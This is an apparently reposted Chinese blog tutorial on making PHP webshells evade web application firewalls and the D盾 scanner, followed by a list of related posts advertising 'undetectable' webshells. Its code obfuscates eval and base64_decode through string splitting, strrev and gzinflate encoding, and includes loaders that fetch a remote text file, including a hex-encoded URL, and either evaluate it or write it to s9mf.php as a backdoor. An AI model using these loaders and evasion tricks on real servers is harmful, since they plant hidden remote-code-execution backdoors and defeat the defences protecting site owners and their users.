php大马免杀技巧 | bypass waf

最新推荐文章于 2025-05-29 21:40:20 发布
转载 最新推荐文章于 2025-05-29 21:40:20 发布 · 506 阅读 · 3 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/s0mf/p/9373471.html
文章标签:

#php

本文详细介绍了使用PHP进行Web攻击时的各种免杀技巧,包括利用eval执行代码、代码加密与解密方法、关键字免杀策略及远程执行payload等手段,并讨论了如何绕过WAF的检测。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Part 1 前言

  

 

Part 2 免杀

  执行代码

eval 或 preg_replace的/e修饰符来执行大马代码。

 

 

   

$a = 'phpinfo();';
eval($a);
//eval执行php代码

 

  编码

如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。

 

 

eval_gzinflate_base64类型加密与解密:

http://www.zhuisu.net/tool/phpencode.php

https://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php

 

自己写脚本加密:

$code= file_get_contents('D:\phpStudy\WWW\Test\Zlib\help.txt'); //大马源码路径
$encode = base64_encode(gzdeflate($code));  //加密函数自己修改就行
echo $encode; //输出加密后代码

 

  解码

通过解码执行我们的代码。

 

  

 

  

<?php                         //加密的代码
eval(gzinflate(base64_decode('S03OyFdQ8shUKLbMTVOyBgA=')));
?>

 

  关键字免杀

// 类型这样的关键字如果没有混淆拆分是过不了waf的
eval(gzinflate(base64_decode

// 我们需要做的就是关键字免杀

 

  免杀 payload

<?php
$l='baSe6';
$o='4_dE';
$v='cO';
$e='DE';
$love=$l.$o.$v.$e;
$c = "love";
$a=$$c('源码base64加密');
eval($a);
?>

<?php
$a = strrev('EdOcEd_46eSaB'); 
$b= $a('源码base64加密');
eval($b);
?>

 

  D盾

  

  查杀

 

  免杀远程执行 payload

    <?php $a=/**/fopen('http://www.xxx.com/s9mf.txt','r');$b='';while(false!=($c=fread($a,8080))){$b.=$c;}print/**/(/**/eval(/**/($c=$b)/**/)/**/);fclose($a);?>
    
    <?php
    $s9 = "687474703A2F2F7033733232373538752E626B742E636C6F7564646E2E636F6D2F73396D662E747874";
    $m="s9";  //远程URL进行hex编码
    $f = file_get_contents(PACK('H*',$$m));
    eval($f);
  ?>

  

  免杀

 

  远程下载 payload

<?php
$a = 'http://www.xx.com/s9mf.txt';
$b = 'file'.'_g'.'et_'.'contents';
$b = $b($a);
$c = strrev('stnetnoc_tup_elif');
$c('s9mf.php', $b);
?>

  

  免杀,D盾报了1级,可以完全免杀的,但是觉得没必要。

 

  Part 3 总结

 

             

 

  

  

转载于:https://www.cnblogs.com/s0mf/p/9373471.html

PHP WebShell
悦分享
08-01 7388
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
攻防演练中PHP大马分析实战_afei00123
afei001
07-10 1168
在一次HVV行动中,在某天眼设备上发现红队在尝试通过命令执行下载了一个可疑的txt文件。该文件经分析是一个不错的PHP大马
php大马
03-03
过目前所有市面的各类防御,仅供参考。切勿用于非法途径。
php超小大马_php大马技巧 | bypass waf
weixin_39885166的博客
12-20 445
Part 1 前言Part 2 执行代码eval 或 preg_replace的/e修饰符来执行大马代码。$a = 'phpinfo();';eval($a);//eval执行php代码编码如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。eval_gzinflate_base64类型加密与解密:http://www.zhuisu.net/tool/phpencode.ph...
一句话木
最新发布
knightKevin的博客
05-29 347
一定要注意很多php一句话木,一定要注意你写的版本和目标php的版本,版本不一致,版本不兼容很容易导致失败。就算不报错也要注意自己写的绕过自己是否可以识别,你就比如说你使用base64加密,虽然你加密成功了,但是的工具蚁剑是否可以连上。你的工具要是别的出你后的代码。比如说360这种查木的时候规则设置并不完美,所以可以通过字符串拼接,字符串旋转,变小写等等,进行绕过。不过这都是过时又简单的方式。接下来可以通过编码解码的方式进行绕过。虽然代码我不能理解,但是老师jaden现实了,我还是先记下来。
php大马
07-12
常用的php大马,可提权反弹。 常用提权大马常用的php大马,可提权反弹。 常用提权大马
php大马过所有By:鸿哥
05-25
默认shell登陆密码admin,过安全狗,护卫神,等安全是关于网络的都直接过
php webshell初探
qq_57861415的博客
02-07 682
前段时间上班无聊,刷公众号偶然发现一篇“”的文章,突然来了兴趣研究研究,找了曾哥的来看。自己做了几个样本,效果测试还不错,就放出来和大家交流,感觉基本够用。截止2月6日。
bypass waf
10-19
对于很多,和我一样刚刚入门,或者还在门边徘徊的小伙伴们,在渗透学习的过程中,总会遇到各种情况,例如php大马waf拦截的时候,那么如何制作php webshell呢,接下来就由我带各位小伙伴们一起踏上大马之路...
php大马过安全狗D盾和云锁
04-10
php大马过安全狗D盾和云锁
php后门文件的总结
W小哥
03-12 726
参考网址:https://xz.aliyun.com/t/5152 一、函数eval 与函数 assert介绍 eval函数 eval 是一个语言构造器而不是一个函数,不能被可变函数调用 可变函数: 通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行。 通俗的说比如 <?php $a=eval;$a() ?> 这样是不行的,也...
未加密php大马.php
02-21
现在的后门里面都有内藏后门,会被黑吃黑,我分享的这个大马全解密,不会被螳螂捕蝉黄雀在后。可以过一些nginx防火墙的后门查,防止被爆破密码,密码输错你指定的次数就拉黑ip段,后门登录需要账号和密码,非泛滥后门,珍藏未加密的webhsell 默认账号csdn 密码csdn
2017php大马 过狗
02-19
才卖一个资源分了,密码123123
php大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
2019最新过狗过,云锁,360等WAFPHP大马
02-02
2019最新过狗过,云锁,360等WAFPHP大马等主流防护软件
php超小大马_PHP大马的奇淫技巧
weixin_34150870的博客
02-28 2892
本文最后更新于可能会因为没有更新而失效。如已失效或需要修正,请留言!Part 1 Part 2大马后门检查: Fiddler 抓包 审计代码修改并运行脚本 Burp 抓包或者右键查看原代码 修改并运行代码 再使用 Burp 抓个包 查找关键字 GetHtml hmlogin localhost 等 把上图的 base64 代码解密下 Part 3大马源码这里我使用的是国外的一款大...
浅谈PHP大马之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 3488
PHP方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
死神来临php大马代码
04-27
死神来临php大马代码
深入解析NEWWebshell技术与PHP实现
资源摘要信息:"new.bypass_bypass_NEW__webshell_phpwebshell" 标题中提到的“new.bypass_bypass_NEW__webshell_phpwebshell”指的是一种具有特性的PHP类型的webshell。webshell是一种可以通过Web界面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值